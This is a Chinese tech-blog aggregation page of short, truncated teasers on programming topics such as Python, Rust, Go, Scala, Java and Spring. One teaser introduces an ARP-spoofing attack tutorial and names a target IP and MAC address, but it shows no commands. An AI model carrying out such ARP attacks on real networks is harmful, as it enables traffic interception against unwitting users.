abs函数是MATLAB编程语言中的一个内置函数，用于计算给定数值的绝对值。它可以应用于标量、向量、矩阵或复数数据类型，并返回相应的绝对值结果。语法：y=abs(x)其中，x是输入数值，可以是标量、向量、矩阵或复数；y是返回的绝对值结果，与输入x的类型相同。下面我们将详细介绍abs函数的用法，并给出一些示例代码。计算标量的绝对值当输入参数为标量时，abs函数直接返回该标量的绝对值。示例代码：x=-
基于Python的开源量化交易框架：构建你的量化投资策略 ShAutoit python 开发语言
量化投资是一种利用数学和统计模型来进行投资决策的方法，它将大量的金融数据与算法相结合，以识别交易机会并执行交易。Python作为一种功能强大且易于使用的编程语言，为开发和实施量化交易策略提供了很好的支持。本文将介绍基于Python的开源量化交易框架，帮助你构建自己的量化投资策略。数据获取和处理在量化投资中，数据是至关重要的。你需要获取和处理市场数据，包括股票价格、指数数据、财务数据等。在Pytho
使用Python实现并行计算算法：效率提升的利器 Echo_Wish Python进阶 python 算法开发语言
在处理大规模数据和计算密集型任务时，单线程的处理方式往往显得力不从心。并行计算作为一种提升计算效率的重要手段，能够充分利用多核处理器的优势，加速任务的完成。Python作为一种灵活且功能强大的编程语言，提供了丰富的并行计算工具。本文将详细介绍如何使用Python实现并行计算算法，并通过具体代码示例展示其实现过程。项目概述本项目旨在通过Python实现一个并行计算算法，展示如何利用Python的多线
Python并行计算：提高效率的利器 uote_e python java linux Python
在现代计算领域中，处理大规模数据和复杂计算任务是常见的挑战。为了应对这些挑战，一种常见的解决方案是利用并行计算技术。Python作为一种流行的编程语言，也提供了强大的工具和库来支持并行计算。本文将介绍Python中的并行计算概念和技术，并提供一些示例代码。并行计算简介并行计算是指同时执行多个计算任务，以提高计算效率。在传统的串行计算中，任务是按顺序依次执行的，而并行计算可以将任务分解成多个子任务，
solidity基础 -- 合约结构第十六年盛夏. Solidity 区块链智能合约
所有本篇以及以前出现的代码均可以在本人GitHubGitHub-solidity学习代码上找到合约结构在Solidity中，合约类似于面向对象编程语言中的类。每个合约中可以包含状态变量、函数、函数修饰器、事件、结构类型、和枚举类型的声明，且合约可以从其他合约继承。状态变量状态变量是永久地存储在合约存储中的值。pragmasolidity^0.4.0;contractSimpleStorage{ui
chatgpt赋能python：Python重装pip：解决Python包管理器问题 sc17332889342 ChatGpt chatgpt python pip 计算机
Python重装pip：解决Python包管理器问题介绍Python是一种开发流行的编程语言，因其易于学习，功能强大和易于使用的包管理器而闻名。pip是Python软件包管理器，可让开发人员轻松地使用Python软件包。许多开发人员可能遇到过pip问题，如错误消息或无法安装软件包。幸运的是，重新安装pip是解决这些问题的常见方法。在此文章中，我们将介绍如何重装pip，解决常见的Python包管理问
Pygubu：Tkinter界面设计的得力助手牧怡泳
Pygubu：Tkinter界面设计的得力助手pygubuAsimpleGUIbuilderforthepythontkintermodule项目地址:https://gitcode.com/gh_mirrors/py/pygubuPygubu，一个专为Python开发者打造的轻量级GUI构建器，采用Python编程语言实现。它简化了基于Tkinter模块的图形用户界面的创建过程，让快速原型设计和
C++从入门到实战（二）C++命名空间珹洺 C++学习之旅 c++算法开发语言
C++从入门到实战（二）C++命名空间前言一、C++的第一个程序二、命名空间（一）为什么需要命名空间（二）定义命名空间（三）使用命名空间1.通过命名空间限定符：2.使用using声明：2.1展开命名空间2.2使用usingnamespace（四）嵌套命名空间（五）标准命名空间std前言上一节我们介绍了C++的历史，对这门强大编程语言的发展脉络有了清晰认识。这一节我们将围绕着C++的第一个程序，深入
Go语言的语法糖 Linux520小飞鱼包罗万象 golang 开发语言后端
Go语言的语法糖：让编码更简单的秘密在编程语言的世界中，语法糖（SyntacticSugar）是一种让代码更简洁易懂的语法特性。它并不改变语言的功能或表达能力，而是通过简化表达方式来提升开发者的编码体验。Go语言，作为一种现代编程语言，其设计目标之一就是简化开发者的工作，而语法糖就是实现这一目标的重要手段之一。本文将深入探讨Go语言中的各类语法糖，从基本语法到高阶特性，揭示其背后的设计理念及应用场
go语言中的函数详解倾城璧Ｇｏ语言基础知识 golang 开发语言后端
1.引言函数是编程中不可或缺的组成部分，无论是在Go语言还是其他编程语言中，函数都扮演着重要的角色。函数能够将一系列的操作封装在一起，使得代码更加模块化、可重用和易于维护。在本文中，我们将详细介绍Go语言中函数的概念和使用方法，包括函数的定义、参数和返回值、调用方式、可变参数、函数作为参数和返回值等方面的内容。2.函数的基本定义在Go语言中，定义函数需要按照以下语法：funcfunctionNam
Golang的图形编程应用案例分析与技术深入武昌库里写JAVA 面试题汇总与解析课程设计 spring boot layui 毕业设计 spring
Golang的图形编程应用案例分析与技术深入一、Golang在图形编程中的应用介绍作为一种高效、简洁的编程语言，近年来在图形编程领域也逐渐展露头角。其并发性能优势和丰富的标准库使得它成为了一个越来越受欢迎的选择。与传统的图形编程语言相比，Golang具有更好的性能和可伸缩性。它的并发原语和轻量级线程（goroutine）模型使得它在处理图形界面事件和渲染时更加高效。此外，Golang也有丰富的第三
用 Java 的思路快速学习 Scala 进朱者赤其他大数据 scala Scala
引言Scala是一种结合了面向对象和函数式编程的现代编程语言，广泛应用于大数据处理框架如ApacheSpark和ApacheFlink。对于熟悉Java的开发者来说，Scala的学习曲线相对平缓。本文将通过类比Java中的概念，帮助Java开发者快速上手Scala。1.基本语法1.1.数据类型以下是Scala和Java数据类型的汇总表格：Scala数据类型Java数据类型说明Intint32位整数
Python快速使用js接口程序媛小本 python javascript udp
在跨语言编程和Web开发中，Python和JavaScript是两种常用的编程语言。有时候，我们可能需要在Python环境中执行JavaScript代码。这就是execjs库发挥作用的地方。一、安装ExecJS在命令行中输入以下命令：pipinstallPyExecJS二、ExecJS的基本使用ExecJS支持多种JavaScript运行时环境，包括Node.js、SpiderMonkey、Web
python如何在一个类里面调用另一个类里面的东西 xiamu_CDA python 开发语言
Python高手必备：轻松实现在一个类里调用另一个类的方法和属性Python是一门强大且灵活的编程语言，它的面向对象特性使得开发者可以轻松地组织和管理代码。然而，在实际开发过程中，我们经常会遇到这样一个问题：如何在一个类里面调用另一个类里面的东西？这看似简单的问题背后其实涉及到了许多面向对象编程的核心概念。本文将深入探讨这个问题，并提供几种实现方法，帮助你更好地理解和应用Python的类。为什么需
构建一个rust生产应用读书笔记6-拒绝无效订阅者02 编码浪子 Rust学习 rust 开发语言后端
打破域子模块通常指的是对应用程序的某个特定业务领域进行重构或重新组织。这可能包括拆分、合并或重组代码结构以更好地反映业务规则和逻辑。下面是一些关于如何处理这种情况的建议：1.理解当前状态首先，确保你完全理解现有系统的工作方式。这包括：阅读文档：如果有任何现有的文档，请先阅读。代码审查：深入研究代码库，了解各个部分的功能和相互之间的关系。与团队沟通：与熟悉系统的同事讨论，获取他们的见解和经验。2.定
构建一个rust生产应用读书笔记四（实战6）编码浪子 Rust学习 rust 网络 oracle
本节我们开始使用tracing来记录日志，实际上在生产环境中，更推荐使用tracing作为日志记录的首先，它提供了更丰富的上下文信息和结构化日志记录功能。tracing不仅可以记录日志信息，还可以跟踪函数调用、异步任务等，适用于复杂的分布式系统和微服务架构。添加配置依赖#Cargo.tomltracing="0.1.19"tracing-subscriber={version="0.3",feat
构建一个rust生产应用读书笔记6-拒绝无效订阅者01 编码浪子 Rust学习 rust oracle 数据库
为了增强您的POST/subscriptions端点的安全性和可靠性，确保输入数据的质量和有效性是非常重要的。当前的实现似乎只做了最基础的验证——即检查name和email字段是否存在。这样的做法可能会让系统暴露于各种潜在的问题之下，例如恶意用户提交无效或格式不正确的数据，或者导致数据库中存储了低质量的数据。改进输入验证验证数据类型：确保name和email字段是字符串类型。验证长度：为name和
【大数据之路11】多范式编程语言 Scala 程序员老五大数据 scala 开发语言
多范式编程语言Scala1.Scala概述1.Scala介绍2.学习Scala的必要性1.基于编程语⾔⾃身2.基于活跃度2.Scala基础语法1.HelloScala2.变量定义1.变量与常量2.Scala自动类型识别3.lazy懒加载3.数据类型1.相关概述1.Scala数据类型列表2.测试代码3.Scala数据类型结构图2.Scala基本类型操作3.编码规范4.流程控制1.if2.块表达式3.
XXPermissions：Android权限请求框架高喻尤King
XXPermissions：Android权限请求框架XXPermissionsAndroid权限请求框架，已适配Android14项目地址:https://gitcode.com/gh_mirrors/xx/XXPermissions项目基础介绍XXPermissions是一个由CSDN公司开发的Android权限请求框架，主要使用Java编程语言进行开发。该框架旨在简化Android应用中权限
Julia语言的计算机基础 Code侠客行包罗万象 golang 开发语言后端
Julia语言的计算机基础引言随着数据科学、机器学习和高性能计算的快速发展，对编程语言的需求也日益增加。在众多编程语言中，Julia语言因其独特的设计理念和高性能而迅速崛起。本文将详细探讨Julia语言的基础知识，包括其历史背景、安装与环境配置、基本语法、数据结构、函数与模块、以及性能优化等方面，旨在为对Julia感兴趣的读者提供一份全面的入门指南。一、Julia语言简介1.1历史背景Julia是
Scala语言的循环实现 Code侠客行包罗万象 golang 开发语言后端
Scala语言的循环实现在编程中，循环是一个非常重要的概念，它允许我们重复执行某些代码块。Scala作为一种现代化的编程语言，融合了函数式编程和面向对象编程的特点，提供了多种方式来实现循环。在本文中，我们将深入探讨Scala中的循环实现，包括基本的循环结构、使用集合与高阶函数、以及如何利用递归来实现循环。一、基础循环结构Scala提供了几种基础的循环结构，包括for循环、while循环和dowhi
大模型应用开发极简入门-基于GPT-4和ChatGPT（含PDF）大模型入门必看书籍！大模型RAG实战 chatgpt 人工智能 AI大模型大模型 LLM ai agi
一、大模型入门如果你想要入门大模型，这里推荐一本《大模型应用开发极简入门-基于GPT-4和ChatGPT》这本大模型应用开发极简入门手册，为初学者提供了一份清晰、全面的“最小可用知识”，带领大家快速了解GPT-4和ChatGPT的工作原理及优势，并在此基础上使用流行的Python编程语言构建大模型应用。非常适合从其他行业想入门大模型领域的从业者作为入门书籍，对于很多概念做了很通俗易懂的说明和讲解。
最受欢迎的WebAssembly Web开发框架：Blazor前端开发 ScriptWELL wasm 前端
WebAssembly（简称Wasm）是一种用于在Web平台上运行高性能代码的二进制格式。它可以在现代Web浏览器中以原生速度执行，并为开发人员提供了使用其他编程语言编写Web应用程序的能力。在WebAssembly的推动下，出现了许多与其兼容的Web开发框架，其中最受欢迎的之一是Blazor。Blazor是一个由微软开发的Web开发框架，它允许开发人员使用C#语言编写前端Web应用程序。Blaz
Python数据类型与操作昊昊该干饭了 python 数据结构 python 开发语言
Python是一种动态类型的编程语言，拥有丰富的数据类型，这些类型在编程中无处不在，掌握它们是学习Python的第一步。本篇文章将以循序渐进的方式，从字符串、数字，到列表、元组，再到字典，全面讲解它们的定义、常见操作以及应用场景，帮助大家打好Python基础。目录一、字符串：文本处理的基础1.字符串的定义与基本操作常见操作统计字符串中单词个数2.字符串的方法二、数字：Python的数值操作1.数字
java封装继承多态等麦田的设计者 java eclipse jvm c encapsulatopn
最近一段时间看了很多的视频却忘记总结了，现在只能想到什么写什么了，希望能起到一个回忆巩固的作用。 1、final关键字译为：最终的 &
F5与集群的区别 bijian1013 weblogic 集群 F5
http请求配置不是通过集群，而是F5；集群是weblogic容器的，如果是ejb接口是通过集群。 F5同集群的差别，主要还是会话复制的问题，F5一把是分发http请求用的，因为http都是无状态的服务，无需关注会话问题，类似
LeetCode[Math] - #7 Reverse Integer Cwind java 题解 Math LeetCode Algorithm
原题链接：#7 Reverse Integer 要求：按位反转输入的数字例1：输入 x = 123, 返回 321 例2：输入 x = -123, 返回 -321 难度：简单分析：对于一般情况，首先保存输入数字的符号，然后每次取输入的末位（x%10）作为输出的高位（result = result*10 + x%10）即可。但
BufferedOutputStream 周凡杨
首先说一下这个大批量，是指有上千万的数据量。例子：有一张短信历史表，其数据有上千万条数据，要进行数据备份到文本文件，就是执行如下SQL然后将结果集写入到文件中！ select t.msisd
linux下模拟按键输入和鼠标被触发 linux
查看/dev/input/eventX是什么类型的事件， cat /proc/bus/input/devices 设备有着自己特殊的按键键码，我需要将一些标准的按键，比如0－9，X－Z等模拟成标准按键，比如KEY_0,KEY-Z等，所以需要用到按键模拟，具体方法就是操作/dev/input/event1文件，向它写入个input_event结构体就可以模拟按键的输入了。 linux/in
ContentProvider初体验肆无忌惮_ ContentProvider
ContentProvider在安卓开发中非常重要。与Activity，Service，BroadcastReceiver并称安卓组件四大天王。在android中的作用是用来对外共享数据。因为安卓程序的数据库文件存放在data/data/packagename里面，这里面的文件默认都是私有的，别的程序无法访问。如果QQ游戏想访问手机QQ的帐号信息一键登录，那么就需要使用内容提供者COnte
关于Spring MVC项目（maven）中通过fileupload上传文件 843977358 mybatis spring mvc 修改头像上传文件 upload
Spring MVC 中通过fileupload上传文件，其中项目使用maven管理。 1.上传文件首先需要的是导入相关支持jar包：commons-fileupload.jar,commons-io.jar 因为我是用的maven管理项目，所以要在pom文件中配置（每个人的jar包位置根据实际情况定） <!-- 文件上传 start by zhangyd-c --&g
使用svnkit api，纯java操作svn，实现svn提交，更新等操作 aigo svnkit
原文：http://blog.csdn.net/hardwin/article/details/7963318 import java.io.File; import org.apache.log4j.Logger; import org.tmatesoft.svn.core.SVNCommitInfo; import org.tmateso
对比浏览器，casperjs，httpclient的Header信息 alleni123 爬虫 crawler header
@Override protected void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { String type=req.getParameter("type"); Enumeration es=re
java.io操作 DataInputStream和DataOutputStream基本数据流百合不是茶 java 流
1，java中如果不保存整个对象，只保存类中的属性，那么我们可以使用本篇文章中的方法，如果要保存整个对象先将类实例化后面的文章将详细写到 2，DataInputStream 是java.io包中一个数据输入流允许应用程序以与机器无关方式从底层输入流中读取基本 Java 数据类型。应用程序可以使用数据输出流写入稍后由数据输入流读取的数据。
车辆保险理赔案例 bijian1013 车险
理赔案例：一货运车，运输公司为车辆购买了机动车商业险和交强险，也买了安全生产责任险，运输一车烟花爆竹，在行驶途中发生爆炸，出现车毁、货损、司机亡、炸死一路人、炸毁一间民宅等惨剧，针对这几种情况，该如何赔付。赔付建议和方案：客户所买交强险在这里不起作用，因为交强险的赔付前提是：“机动车发生道路交通意外事故”；如果是交通意外事故引发的爆炸，则优先适用交强险条款进行赔付，不足的部分由商业
学习Spring必学的Java基础知识(5)—注解 bijian1013 java spring
文章来源：http://www.iteye.com/topic/1123823，整理在我的博客有两个目的：一个是原文确实很不错，通俗易懂，督促自已将博主的这一系列关于Spring文章都学完；另一个原因是为免原文被博主删除，在此记录，方便以后查找阅读。有必要对
【Struts2一】Struts2 Hello World bit1129 Hello world
Struts2 Hello World应用的基本步骤创建Struts2的Hello World应用，包括如下几步： 1.配置web.xml 2.创建Action 3.创建struts.xml，配置Action 4.启动web server，通过浏览器访问配置web.xml <?xml version="1.0" encoding="
【Avro二】Avro RPC框架 bit1129 rpc
1. Avro RPC简介 1.1. RPC RPC逻辑上分为二层，一是传输层，负责网络通信；二是协议层，将数据按照一定协议格式打包和解包从序列化方式来看，Apache Thrift 和Google的Protocol Buffers和Avro应该是属于同一个级别的框架，都能跨语言，性能优秀，数据精简，但是Avro的动态模式（不用生成代码，而且性能很好）这个特点让人非常喜欢，比较适合R
lua　set get cookie ronin47 lua cookie
lua: local access_token = ngx.var.cookie_SGAccessToken if access_token then ngx.header["Set-Cookie"] = "SGAccessToken="..access_token.."; path=/;Max-Age=3000" end
java-打印不大于N的质数 bylijinnan java
public class PrimeNumber { /** * 寻找不大于N的质数 */ public static void main(String[] args) { int n=100; PrimeNumber pn=new PrimeNumber(); pn.printPrimeNumber(n); System.out.print
Spring源码学习-PropertyPlaceholderHelper bylijinnan java spring
今天在看Spring 3.0.0.RELEASE的源码，发现PropertyPlaceholderHelper的一个bug 当时觉得奇怪，上网一搜，果然是个bug，不过早就有人发现了，且已经修复：详见： http://forum.spring.io/forum/spring-projects/container/88107-propertyplaceholderhelper-bug
[逻辑与拓扑]布尔逻辑与拓扑结构的结合会产生什么? comsci 拓扑
如果我们已经在一个工作流的节点中嵌入了可以进行逻辑推理的代码,那么成百上千个这样的节点如果组成一个拓扑网络,而这个网络是可以自动遍历的,非线性的拓扑计算模型和节点内部的布尔逻辑处理的结合,会产生什么样的结果呢? 是否可以形成一种新的模糊语言识别和处理模型呢? 大家有兴趣可以试试,用软件搞这些有个好处,就是花钱比较少,就算不成
ITEYE 都换百度推广了 cuisuqiang Google AdSense 百度推广广告外快
以前ITEYE的广告都是谷歌的Google AdSense，现在都换成百度推广了。为什么个人博客设置里面还是Google AdSense呢？都知道Google AdSense不好申请，这在ITEYE上也不是讨论了一两天了，强烈建议ITEYE换掉Google AdSense。至少，用一个好申请的吧。什么时候能从ITEYE上来点外快，哪怕少点
新浪微博技术架构分析 dalan_123 新浪微博架构
新浪微博在短短一年时间内从零发展到五千万用户，我们的基层架构也发展了几个版本。第一版就是是非常快的，我们可以非常快的实现我们的模块。我们看一下技术特点，微博这个产品从架构上来分析，它需要解决的是发表和订阅的问题。我们第一版采用的是推的消息模式，假如说我们一个明星用户他有10万个粉丝，那就是说用户发表一条微博的时候，我们把这个微博消息攒成10万份，这样就是很简单了，第一版的架构实际上就是这两行字。第
玩转ARP攻击 dcj3sjt126com r
我写这片文章只是想让你明白深刻理解某一协议的好处。高手免看。如果有人利用这片文章所做的一切事情，盖不负责。网上关于ARP的资料已经很多了，就不用我都说了。用某一位高手的话来说，“我们能做的事情很多，唯一受限制的是我们的创造力和想象力”。 ARP也是如此。以下讨论的机子有一个要攻击的机子：10.5.4.178 硬件地址：52:54:4C:98
PHP编码规范 dcj3sjt126com 编码规范
一、文件格式 1. 对于只含有 php 代码的文件，我们将在文件结尾处忽略掉 "?>" 。这是为了防止多余的空格或者其它字符影响到代码。例如：<?php$foo = 'foo';2. 缩进应该能够反映出代码的逻辑结果，尽量使用四个空格，禁止使用制表符TAB，因为这样能够保证有跨客户端编程器软件的灵活性。例
linux 脱机管理（nohup） eksliang linux nohup nohup
脱机管理 nohup 转载请出自出处：http://eksliang.iteye.com/blog/2166699 nohup可以让你在脱机或者注销系统后，还能够让工作继续进行。他的语法如下 nohup [命令与参数] --在终端机前台工作 nohup [命令与参数] & --在终端机后台工作但是这个命令需要注意的是，nohup并不支持bash的内置命令，所
BusinessObjects Enterprise Java SDK greemranqq java BO SAP Crystal Reports
最近项目用到oracle_ADF 从SAP/BO 上调用水晶报表，资料比较少，我做一个简单的分享，给和我一样的新手提供更多的便利。首先，我是尝试用JAVA JSP 去访问的。官方API：http://devlibrary.businessobjects.com/BusinessObjectsxi/en/en/BOE_SDK/boesdk_ja
系统负载剧变下的管控策略 iamzhongyong 高并发
假如目前的系统有100台机器，能够支撑每天1亿的点击量（这个就简单比喻一下），然后系统流量剧变了要，我如何应对，系统有那些策略可以处理，这里总结了一下之前的一些做法。 1、水平扩展这个最容易理解，加机器，这样的话对于系统刚刚开始的伸缩性设计要求比较高，能够非常灵活的添加机器，来应对流量的变化。 2、系统分组假如系统服务的业务不同，有优先级高的，有优先级低的，那就让不同的业务调用提前分组
BitTorrent DHT 协议中文翻译 justjavac bit
前言做了一个磁力链接和BT种子的搜索引擎 {Magnet & Torrent}，因此把 DHT 协议重新看了一遍。 BEP: 5Title: DHT ProtocolVersion: 3dec52cb3ae103ce22358e3894b31cad47a6f22bLast-Modified: Tue Apr 2 16:51:45 2013 -070
Ubuntu下Java环境的搭建 macroli java 工作 ubuntu
配置命令：　　$sudo apt-get install ubuntu-restricted-extras 　　再运行如下命令：　　$sudo apt-get install sun-java6-jdk 　　待安装完毕后选择默认Java. 　　$sudo update- alternatives --config java 　　安装过程提示选择，输入“2”即可，然后按回车键确定。
js字符串转日期（兼容IE所有版本） qiaolevip TO Date String IE
/** * 字符串转时间（yyyy-MM-dd HH:mm:ss） * result （分钟） */ stringToDate : function(fDate){ var fullDate = fDate.split(" ")[0].split("-"); var fullTime = fDate.split("
【数据挖掘学习】关联规则算法Apriori的学习与SQL简单实现购物篮分析 superlxw1234 sql 数据挖掘关联规则
关联规则挖掘用于寻找给定数据集中项之间的有趣的关联或相关关系。关联规则揭示了数据项间的未知的依赖关系，根据所挖掘的关联关系，可以从一个数据对象的信息来推断另一个数据对象的信息。例如购物篮分析。牛奶 ⇒ 面包 [支持度：3%，置信度：40%] 支持度3%：意味3%顾客同时购买牛奶和面包。置信度40%：意味购买牛奶的顾客40%也购买面包。规则的支持度和置信度是两个规则兴
Spring 5.0 的系统需求，期待你的反馈 wiselyman spring
Spring 5.0将在2016年发布。Spring5.0将支持JDK 9。 Spring 5.0的特性计划还在工作中，请保持关注，所以作者希望从使用者得到关于Spring 5.0系统需求方面的反馈。